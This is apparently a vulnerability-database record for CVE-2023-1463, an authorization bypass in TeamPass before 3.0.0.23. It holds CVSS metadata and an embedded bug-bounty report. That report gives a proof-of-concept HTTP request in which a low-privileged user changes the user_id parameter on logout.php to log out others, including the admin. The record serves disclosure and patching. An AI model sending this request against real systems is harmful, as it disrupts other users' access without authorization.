Description
Authorization Bypass Through User-Controlled Key in GitHub repository nilsteampassnet/teampass prior to 3.0.0.23.
Affected Software
Related
{"id": "CVE-2023-1463", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2023-1463", "description": "Authorization Bypass Through User-Controlled Key in GitHub repository nilsteampassnet/teampass prior to 3.0.0.23.", "published": "2023-03-17T12:15:00", "modified": "2023-04-26T16:15:00", "epss": [{"cve": "CVE-2023-1463", "epss": 0.00044, "percentile": 0.08492, "modified": "2023-06-03"}], "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 5.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW", "baseScore": 5.4, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-1463", "reporter": "security@huntr.dev", "references": ["https://huntr.dev/bounties/f6683c3b-a0f2-4615-b639-1920c8ae12e6", "https://github.com/nilsteampassnet/teampass/commit/4e06fbaf2b78c3615d0599855a72ba7e31157516"], "cvelist": ["CVE-2023-1463"], "immutableFields": [], "lastseen": "2023-06-03T17:36:49", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "github", "idList": ["GHSA-86JQ-PWGX-6VRQ"]}, {"type": "huntr", "idList": ["F6683C3B-A0F2-4615-B639-1920C8AE12E6"]}, {"type": "osv", "idList": ["OSV:GHSA-86JQ-PWGX-6VRQ"]}, {"type": "veracode", "idList": ["VERACODE:39911"]}]}, "score": {"value": 5.6, "vector": "NONE"}, "affected_software": {"major_version": [{"name": "teampass", "version": 3}]}, "epss": [{"cve": "CVE-2023-1463", "epss": 0.00044, "percentile": 0.11105, "modified": "2023-05-02"}], "vulnersScore": 5.6}, "_state": {"dependencies": 0, "score": 1685814097, "affected_software_major_version": 0, "epss": 0}, "_internal": {"score_hash": "10bca8c523616978df8d284271510b78"}, "cna_cvss": {"cna": "huntr.dev", "cvss": {"3": {"vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "score": 6.3}}}, "cpe": [], "cpe23": [], "cwe": ["CWE-639"], "affectedSoftware": [{"cpeName": "teampass:teampass", "version": "3.0.0.23", "operator": "lt", "name": "teampass"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:teampass:teampass:3.0.0.23:*:*:*:*:*:*:*", "versionEndExcluding": "3.0.0.23", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://huntr.dev/bounties/f6683c3b-a0f2-4615-b639-1920c8ae12e6", "name": "https://huntr.dev/bounties/f6683c3b-a0f2-4615-b639-1920c8ae12e6", "refsource": "CONFIRM", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/nilsteampassnet/teampass/commit/4e06fbaf2b78c3615d0599855a72ba7e31157516", "name": "https://github.com/nilsteampassnet/teampass/commit/4e06fbaf2b78c3615d0599855a72ba7e31157516", "refsource": "MISC", "tags": ["Patch"]}], "product_info": [{"vendor": "nilsteampassnet", "product": "nilsteampassnet/teampass"}], "solutions": [], "workarounds": [], "impacts": [], "problemTypes": [{"descriptions": [{"type": "CWE", "lang": "en", "description": "CWE-639 Authorization Bypass Through User-Controlled Key", "cweId": "CWE-639"}]}], "exploits": []}
{"osv": [{"lastseen": "2023-04-11T01:35:09", "description": "Improper Authorization in GitHub repository nilsteampassnet/teampass prior to 3.0.0.23.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2023-03-17T12:30:40", "type": "osv", "title": "Improper Authorization in nilsteampassnet/teampass", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2023-1463"], "modified": "2023-04-11T01:35:04", "id": "OSV:GHSA-86JQ-PWGX-6VRQ", "href": "https://osv.dev/vulnerability/GHSA-86jq-pwgx-6vrq", "cvss": {"score": 0.0, "vector": "NONE"}}], "huntr": [{"lastseen": "2023-06-03T18:25:43", "description": "# Description\nIDOR vulnerability allow low level user to log out everyone in the system by changing the user ID.\n\n # Proof of Concept\nStep 1: Login in as admin\n\nStep 2: Go to user and add an user. Set role to Default.\n\nStep 3: Login as the new user.\n\nStep 4: Logout the user\n\n\n```\nGET /teampass/includes/core/logout.php?user_id=10000001 HTTP/1.1\nHost: localhost\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nReferer: http://localhost/teampass/index.php?page=items\nCookie: 4a5b833fa554df2e84c76e5cd45ce14cd307ceebac65bd2722=569d0d699362872a0cb318b102a9c98e6e36a30f11823ec5a1; teampass_session=r511n6jfa0dqvm7jpjcipmdc1a; jstree_select=2\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: same-origin\nSec-Fetch-User: ?1\n```\nChange the *user_id* to any other id. For this example, we use 1 as *admin* user_id\n\nBelow is the response of the request submitted at above.\n\n```\nHTTP/1.1 200 OK\nDate: Tue, 28 Feb 2023 07:25:00 GMT\nServer: Apache/2.4.54 (Debian)\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nVary: Accept-Encoding\nContent-Length: 526\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n\n <script type=\"text/javascript\" src=\"../../plugins/store.js/dist/store.everything.min.js\"></script>\n <script language=\"javascript\" type=\"text/javascript\">\n <!--\n // Clear localstorage\n store.remove(\"teampassApplication\");\n store.remove(\"teampassSettings\");\n store.remove(\"teampassUser\");\n store.remove(\"teampassItem\");\n sessionStorage.clear();\n \n setTimeout(function() {\n document.location.href=\"../../index.php\"\n }, 1);\n -->\n </script>\n```\nStep 5: Admin has logged out", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2023-02-28T07:46:06", "type": "huntr", "title": "IDOR Vulnerability Allow Low-Level User Logout Everyone Includes Admin", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-1463"], "modified": "2023-03-17T10:37:28", "id": "F6683C3B-A0F2-4615-B639-1920C8AE12E6", "href": "https://www.huntr.dev/bounties/f6683c3b-a0f2-4615-b639-1920c8ae12e6/", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:P"}}], "veracode": [{"lastseen": "2023-06-03T19:50:50", "description": "nilsteampassnet/teampass is vulnerable to Improper Authorization. The vulnerability allows an attacker with low-level privileges to logout everyone out including the admin due to an Insecure Direct Object References (IDOR) via the user ID.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2023-03-23T00:27:22", "type": "veracode", "title": "Improper Authorization", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-1463"], "modified": "2023-04-26T18:18:36", "id": "VERACODE:39911", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-39911/summary", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:P"}}], "github": [{"lastseen": "2023-06-03T20:12:26", "description": "Improper Authorization in GitHub repository nilsteampassnet/teampass prior to 3.0.0.23.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2023-03-17T12:30:40", "type": "github", "title": "Improper Authorization in nilsteampassnet/teampass", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-1463"], "modified": "2023-03-23T18:20:49", "id": "GHSA-86JQ-PWGX-6VRQ", "href": "https://github.com/advisories/GHSA-86jq-pwgx-6vrq", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:P"}}]}
CVE-2023-1463
